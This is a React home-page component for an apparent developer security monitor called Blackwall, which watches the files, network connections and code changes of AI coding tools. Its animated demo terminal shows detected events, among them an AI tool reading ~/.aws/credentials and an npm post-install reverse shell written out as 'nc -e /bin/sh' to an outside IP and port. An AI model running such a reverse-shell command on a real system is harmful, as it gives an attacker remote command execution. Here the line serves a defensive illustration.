import React, { useState, useEffect } from "react";
import { Link } from "react-router-dom";
import { Shield, ArrowRight, GitBranch, Eye, Zap, Lock } from "lucide-react";
import TerminalWindow from "../components/TerminalWindow";
import CopyableCode from "../components/CopyableCode";

const TERMINAL_LINES = [
  { type: "cmd",      text: "> blackwall --monitor",                             delay: 0 },
  { type: "spinner",  text: "⠦ Initializing sensors...",                        delay: 500 },
  { type: "ok",       text: "✓ Process sensor active",                           delay: 1000 },
  { type: "ok",       text: "✓ Network sensor active",                           delay: 1300 },
  { type: "ok",       text: "✓ File sensor active",                              delay: 1600 },
  { type: "sep",      text: "",                                                   delay: 1900 },
  { type: "info",     text: "10:41  [Info]      Cursor launched (PID 4821)",      delay: 2400 },
  { type: "info",     text: "10:41  [Info]      Cursor → api.cursor.sh ✓",        delay: 2900 },
  { type: "high",     text: "10:42  [High]      Cursor read ~/.aws/credentials",  delay: 3600 },
  { type: "critical", text: "10:43  [Critical]  Supply Chain Attack",             delay: 4300 },
  { type: "desc",     text: "                   npm → nc -e /bin/sh 45.33.32.156:4444", delay: 4600 },
  { type: "sep",      text: "",                                                   delay: 4900 },
  { type: "prompt",   text: "Press ? for explanation",                            delay: 5300 },
];

const LINE_COLORS = {
  cmd:      "text-[#ededed]",
  spinner:  "text-[#71717a]",
  ok:       "text-[#10b981]",
  info:     "text-[#71717a]",
  high:     "text-[#f97316]",
  critical: "text-[#ef4444] font-semibold",
  desc:     "text-[#52525b]",
  prompt:   "text-[#f59e0b] animate-pulse",
  sep:      "h-2 block",
};

function HeroTerminal() {
  const [visible, setVisible] = useState([]);
  useEffect(() => {
    const timers = TERMINAL_LINES.map((line, i) =>
      setTimeout(() => setVisible((prev) => [...prev, i]), line.delay)
    );
    return () => timers.forEach(clearTimeout);
  }, []);

  return (
    <TerminalWindow title="blackwall — ~/projects/myapp" className="w-full">
      {TERMINAL_LINES.map((line, i) =>
        visible.includes(i) ? (
          line.type === "sep" ? (
            <div key={i} className="h-2" />
          ) : (
            <div key={i} className={`${LINE_COLORS[line.type]} animate-fade-in leading-6`}>
              {line.text}
            </div>
          )
        ) : null
      )}
      {visible.length > 0 && visible.length < TERMINAL_LINES.length && (
        <span className="inline-block w-2 h-4 bg-[#ededed] cursor-blink align-middle ml-0.5" />
      )}
    </TerminalWindow>
  );
}

const FILE_FEATURES = [
  {
    path: "/watch",
    title: "Watch everything",
    body: "Blackwall monitors processes, network connections, and file changes with zero configuration. Every event your AI tools trigger is captured in real-time.",
    term: [
      { c: "text-[#71717a]", t: "[Info]  Cursor launched (PID 4821)" },
      { c: "text-[#71717a]", t: "[Info]  Cursor → api.cursor.sh:443" },
      { c: "text-[#71717a]", t: "[Info]  main.rs modified (+23 -5)" },
      { c: "text-[#f97316]", t: "[High]  ~/.aws/credentials accessed" },
    ],
  },
  {
    path: "/understand",
    title: "Understand every alert",
    body: "Every alert comes with plain-English context — what happened, why it matters, and what to check next. No cryptic logs, no guessing.",
    term: [
      { c: "text-[#ef4444]", t: "[Critical] Supply Chain Attack" },
      { c: "text-[#52525b]", t: "" },
      { c: "text-[#71717a]", t: "What:  npm spawned netcat (reverse shell)" },
      { c: "text-[#71717a]", t: "Why:   Malicious post-install script" },
      { c: "text-[#71717a]", t: "Risk:  Remote command execution" },
    ],
  },
  {
    path: "/act",
    title: "Act with confidence",
    body: "See security threats, AI tool behavior, and code changes in one dashboard. Acknowledge, mute, star, or export — you always decide what happens next.",
    term: [
      { c: "text-[#f59e0b]", t: "[ ? ] Explain   [ * ] Star   [ k ] Kill" },
      { c: "text-[#52525b]", t: "" },
      { c: "text-[#10b981]", t: "✓ Process tree terminated (PID 5678)" },
      { c: "text-[#10b981]", t: "✓ Event starred for incident report" },
    ],
  },
];

const STATS = [
  { value: "45+", label: "Detection Rules" },
  { value: "0",   label: "Telemetry by Default" },
  { value: "3",   label: "Monitoring Streams" },
  { value: "100%", label: "Open Source Logic" },
];

const FEATURE_CARDS = [
  {
    icon: <Eye size={18} strokeWidth={1.5} className="text-[#f59e0b]" />,
    title: "AI Activity Timeline",
    body: "See exactly when Cursor launched, what it connected to, and what files it touched — all in one chronological view.",
  },
  {
    icon: <GitBranch size={18} strokeWidth={1.5} className="text-[#06b6d4]" />,
    title: "Git-Aware Monitoring",
    body: "Track code changes with git diffs, commit metadata, and risk tags — CI workflows, secrets, dependencies all flagged.",
  },
  {
    icon: <Shield size={18} strokeWidth={1.5} className="text-[#8b5cf6]" />,
    title: "LLM Security Scanning",
    body: "Detect 12 types of LLM vulnerabilities: prompt injection, missing auth, schema validation gaps, and more.",
  },
  {
    icon: <Zap size={18} strokeWidth={1.5} className="text-[#10b981]" />,
    title: "Correlation, Not Attribution",
    body: "See when code changes happen near AI activity — labeled as correlation, never claimed as proof. Honest visibility.",
  },
];

const TRUST_SIGNALS = [
  {
    label: "Open Source",
    body: "100% of detection logic is public. Audit it yourself. No black boxes, no hidden rules.",
  },
  {
    label: "Local-First",
    body: "All data stays on your machine. Zero telemetry by default. You control what gets exported.",
  },
  {
    label: "Security-First",
    body: "Signed releases. Encrypted logs. Verified installer. We practice what we monitor.",
  },
];

export default function HomePage() {
  const [activeFeature, setActiveFeature] = useState(0);

  return (
    <div className="min-h-screen bg-[#0a0a0a] pt-14">

      {/* ── Hero ─────────────────────────────────────── */}
      <section className="max-w-6xl mx-auto px-6 pt-24 pb-20">
        <div className="grid grid-cols-1 lg:grid-cols-2 gap-12 items-center">

          {/* Left copy */}
          <div className="space-y-6 animate-fade-in-up">
            <div className="inline-flex items-center gap-2 border border-[#262626] rounded-full px-3 py-1">
              <span className="w-1.5 h-1.5 rounded-full bg-[#10b981] inline-block" />
              <span className="text-xs font-mono text-[#71717a]">v1.0 — Available for macOS & Linux</span>
            </div>

            <h1 className="text-4xl md:text-5xl lg:text-6xl font-medium tracking-tight text-[#ededed] leading-[1.1]">
              Know What Your<br />AI Tools Are<br />
              <span className="text-[#f59e0b]">Really Doing</span>
            </h1>

            <p className="text-base text-[#71717a] leading-relaxed max-w-md">
              A security monitor for developers. See every file your AI tools access, every connection they make, and every line of code that changes — all in real-time.
            </p>

            <div className="flex flex-wrap gap-3 pt-2">
              <a
                href="#install"
                data-testid="hero-cta-macos"
                className="px-5 py-2.5 text-sm bg-[#ededed] text-[#0a0a0a] font-medium rounded-full hover:bg-white transition-colors"
              >
                Install for macOS
              </a>
              <a
                href="#install"
                data-testid="hero-cta-linux"
                className="px-5 py-2.5 text-sm border border-[#262626] text-[#ededed] rounded-full hover:border-[#3f3f46] transition-colors"
              >
                Install for Linux
              </a>
              <Link
                to="/how-it-works"
                data-testid="hero-cta-demo"
                className="px-5 py-2.5 text-sm text-[#71717a] hover:text-[#ededed] transition-colors flex items-center gap-1.5"
              >
                See How It Works <ArrowRight size={14} strokeWidth={1.5} />
              </Link>
            </div>

            <CopyableCode code="curl -fsSL https://blackwall-cli.dev/install.sh | bash" />
          </div>

          {/* Right terminal */}
          <div className="animate-fade-in-up delay-200">
            <HeroTerminal />
          </div>
        </div>
      </section>

      {/* ── File-path Feature Showcase ──────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="grid grid-cols-1 lg:grid-cols-[220px_1fr] gap-12">

            {/* Left: file tree */}
            <div className="hidden lg:block">
              <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall</p>
              <ul className="space-y-1">
                {FILE_FEATURES.map((f, i) => (
                  <li key={i}>
                    <button
                      data-testid={`feature-tree-${i}`}
                      onClick={() => setActiveFeature(i)}
                      className={`flex items-center gap-2 text-xs font-mono px-2 py-1.5 rounded w-full text-left transition-colors ${
                        activeFeature === i
                          ? "text-[#ededed] bg-[#1a1a1a]"
                          : "text-[#52525b] hover:text-[#71717a]"
                      }`}
                    >
                      <span className={activeFeature === i ? "text-[#f59e0b]" : "text-[#262626]"}>●</span>
                      {f.path}
                    </button>
                  </li>
                ))}
              </ul>
            </div>

            {/* Right: feature detail */}
            <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
              {FILE_FEATURES.map((f, i) => (
                <div
                  key={i}
                  data-testid={`feature-card-${i}`}
                  onClick={() => setActiveFeature(i)}
                  className={`p-5 rounded-lg border cursor-pointer transition-all duration-200 ${
                    activeFeature === i
                      ? "border-[#f59e0b]/30 bg-[#111111]"
                      : "border-[#1a1a1a] bg-[#0d0d0d] hover:border-[#262626]"
                  }`}
                >
                  <p className="text-xs font-mono text-[#f59e0b] mb-3">● {f.path}</p>
                  <h3 className="text-base font-medium text-[#ededed] mb-2">{f.title}</h3>
                  <p className="text-xs text-[#71717a] leading-relaxed mb-4">{f.body}</p>
                  <div className="bg-[#050505] rounded-md border border-[#1a1a1a] p-3 space-y-1">
                    {f.term.map((t, j) =>
                      t.t === "" ? (
                        <div key={j} className="h-1" />
                      ) : (
                        <div key={j} className={`text-xs font-mono ${t.c}`}>{t.t}</div>
                      )
                    )}
                  </div>
                </div>
              ))}
            </div>
          </div>
        </div>
      </section>

      {/* ── Problem Statement ─────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <h2 className="text-3xl md:text-4xl font-medium tracking-tight text-[#ededed] mb-3">
            You Trust Your AI Tools.<br />
            <span className="text-[#71717a]">Should You?</span>
          </h2>
          <p className="text-sm font-mono text-[#3f3f46] mb-12">
            /blackwall/why-it-matters
          </p>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
            {[
              {
                tag: "The Invisible Risk",
                body: "Cursor, Copilot, and Windsurf help you code faster. But do you know what files they're reading? What data they're sending to remote servers? What happens when a malicious npm package runs while your AI tool is active?",
              },
              {
                tag: "The Attribution Gap",
                body: "Your git history shows a commit. Did you write it? Did the AI suggest it? Did a supply chain attack inject it while the AI was running? Without monitoring, you'll never know.",
              },
              {
                tag: "The Monitoring Blind Spot",
                body: "Traditional security tools don't understand AI coding workflows. They alert on everything or nothing. You need visibility built for how developers actually work in 2025.",
              },
            ].map((item, i) => (
              <div
                key={i}
                data-testid={`problem-card-${i}`}
                className="p-6 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d] hover:border-[#262626] transition-colors"
              >
                <p className="text-xs font-mono text-[#f59e0b] mb-3">● {item.tag}</p>
                <p className="text-sm text-[#71717a] leading-relaxed">{item.body}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── Stats ─────────────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-16">
          <div className="grid grid-cols-2 md:grid-cols-4 gap-8">
            {STATS.map((s, i) => (
              <div key={i} data-testid={`stat-${i}`} className="text-center">
                <div className="text-4xl md:text-5xl font-mono font-medium text-[#ededed] mb-1">
                  {s.value}
                </div>
                <div className="text-xs text-[#52525b] uppercase tracking-widest">{s.label}</div>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── Feature Cards ─────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-12">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/capabilities</p>
            <h2 className="text-3xl md:text-4xl font-medium tracking-tight text-[#ededed]">
              Built for how developers<br />actually work.
            </h2>
          </div>
          <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
            {FEATURE_CARDS.map((card, i) => (
              <div
                key={i}
                data-testid={`capability-card-${i}`}
                className="p-6 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d] hover:border-[#262626] transition-all duration-200 group"
              >
                <div className="mb-4">{card.icon}</div>
                <h3 className="text-base font-medium text-[#ededed] mb-2 group-hover:text-white transition-colors">
                  {card.title}
                </h3>
                <p className="text-sm text-[#71717a] leading-relaxed">{card.body}</p>
              </div>
            ))}
          </div>
          <div className="mt-8 text-center">
            <Link
              to="/features"
              data-testid="all-features-link"
              className="inline-flex items-center gap-2 text-sm text-[#71717a] hover:text-[#ededed] transition-colors"
            >
              See all features <ArrowRight size={14} strokeWidth={1.5} />
            </Link>
          </div>
        </div>
      </section>

      {/* ── Social Proof ─────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-12">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/trust</p>
            <h2 className="text-3xl md:text-4xl font-medium tracking-tight text-[#ededed]">
              Built by developers,<br />for developers.
            </h2>
          </div>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
            {TRUST_SIGNALS.map((item, i) => (
              <div
                key={i}
                data-testid={`trust-signal-${i}`}
                className="p-6 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]"
              >
                <div className="flex items-center gap-2 mb-3">
                  <Lock size={14} strokeWidth={1.5} className="text-[#f59e0b]" />
                  <span className="text-sm font-medium text-[#ededed]">{item.label}</span>
                </div>
                <p className="text-sm text-[#71717a] leading-relaxed">{item.body}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── Final CTA ────────────────────────────── */}
      <section id="install" className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-24 text-center">
          <p className="text-xs font-mono text-[#3f3f46] mb-6">/blackwall/install</p>
          <h2 className="text-3xl md:text-5xl font-medium tracking-tight text-[#ededed] mb-4">
            Your Machine. Your Code.<br />
            <span className="text-[#f59e0b]">Your Visibility.</span>
          </h2>
          <p className="text-base text-[#71717a] mb-10 max-w-md mx-auto">
            Install in 30 seconds. No configuration. No cloud. No telemetry.
          </p>

          <div className="max-w-lg mx-auto space-y-4 mb-8">
            <div>
              <p className="text-xs font-mono text-[#52525b] mb-2 text-left">macOS</p>
              <CopyableCode code="curl -fsSL https://blackwall-cli.dev/install.sh | bash" />
            </div>
            <div>
              <p className="text-xs font-mono text-[#52525b] mb-2 text-left">Linux</p>
              <CopyableCode code="curl -fsSL https://blackwall-cli.dev/linux/install.sh | bash" />
            </div>
          </div>

          <div className="flex items-center justify-center gap-4">
            <a
              href="#"
              data-testid="footer-cta-docs"
              className="text-sm text-[#71717a] hover:text-[#ededed] transition-colors flex items-center gap-1.5"
            >
              Read the Docs <ArrowRight size={14} strokeWidth={1.5} />
            </a>
            <span className="text-[#262626]">|</span>
            <Link
              to="/how-it-works"
              data-testid="footer-cta-demo"
              className="text-sm text-[#71717a] hover:text-[#ededed] transition-colors flex items-center gap-1.5"
            >
              Watch Demo <ArrowRight size={14} strokeWidth={1.5} />
            </Link>
          </div>
        </div>
      </section>
    </div>
  );
}
